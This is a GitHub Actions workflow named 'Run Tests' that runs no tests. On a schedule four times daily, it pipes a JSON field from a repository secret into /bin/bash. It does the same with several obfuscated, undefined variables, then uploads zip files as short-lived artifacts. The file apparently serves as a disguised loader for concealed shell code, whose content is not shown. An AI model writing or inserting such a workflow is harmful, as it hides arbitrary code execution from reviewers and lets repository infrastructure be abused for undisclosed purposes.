name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '51 0,6,12,18 * * *'
env:
  CI: true
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          jx0: ${{ secrets.jx0 }}
        run: |
          printf '%s' "$jx0" | jq -r .wxdlj3 | /bin/bash
          echo $ecpsg12302 | jq -r .k94 | /bin/bash
          echo $xlzz695 | jq -r .jz94688 | /bin/bash
          printf '%s' "$yed6" | jq -r .v139 | /bin/bash
          echo $q8 | jq -r .ysy806 | /bin/bash
          printf '%s' "$swstz5089" | jq -r .b43296 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: SVj2xJtp
          path: "*.zip"
          retention-days: 1
